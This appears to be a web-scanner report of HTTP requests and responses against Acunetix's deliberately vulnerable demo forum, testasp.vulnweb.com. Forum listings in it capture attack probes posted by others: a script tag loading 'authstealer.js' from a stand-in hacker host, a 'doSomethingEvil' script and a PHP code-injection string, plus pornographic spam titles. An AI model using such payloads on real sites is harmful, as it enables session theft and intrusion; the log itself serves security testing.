class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 402 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3673 |
| Response Body - size: 3,673 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 308 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 2809 |
| Response Body - size: 2,809 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 332 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 2961 |
| Response Body - size: 2,961 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'ZAP'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 10037 |
| Response Body - size: 10,037 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>42</a></div></td><td>36</td><td>Pedro Miguel</td><td>3/13/2022 2:43:15 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>42</a></div></td><td>7</td><td>Pedro Miguel</td><td>3/13/2022 3:13:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:13:43 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>Hot galleries, daily updated collections</a></div></td><td>1</td><td>victoriadi1</td><td>3/13/2022 10:23:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics</a></div></td><td>1</td><td>susanac1</td><td>3/13/2022 12:03:13 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates</a></div></td><td>1</td><td>kristiela3</td><td>3/13/2022 3:28:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>New hot project galleries, daily updates</a></div></td><td>1</td><td>friedajd1</td><td>3/13/2022 9:02:56 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>Free Porn Pictures and Best HD Sex Photos</a></div></td><td>1</td><td>dianezg60</td><td>3/13/2022 11:25:30 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>test</a></div></td><td>1</td><td>hanxuan</td><td>3/14/2022 1:14:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>Hot photo galleries blogs and pictures</a></div></td><td>1</td><td>sethpq11</td><td>3/14/2022 2:11:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>${@print(md5(31337))}\</td><td>3/14/2022 4:18:48 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>Shemale Sexy Galleries</a></div></td><td>1</td><td>ineshy11</td><td>3/14/2022 6:42:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div></td><td>1</td><td>myrnaou3</td><td>3/14/2022 7:22:30 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 3101 |
| Response Body - size: 3,101 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Weather</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Weather </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>301 Moved Permanently</a></div></td><td>1</td><td>WinstonVup</td><td>3/14/2022 5:30:18 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 4017 |
| Response Body - size: 4,017 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Miscellaneous</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Miscellaneous </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>ÑайÑ</a></div></td><td>1</td><td>Jamesaidem</td><td>3/13/2022 10:17:25 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>Testing</a></div></td><td>1</td><td> </td><td>3/13/2022 3:11:02 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'><script>doSomethingEvil();</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:31:45 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'><script src=http://hackersite.com/authstealer.js> </script>.</a></div></td><td>1</td><td> </td><td>3/13/2022 3:33:39 PM</td></tr><tr bgcolor='#FFFFFF'><td><div 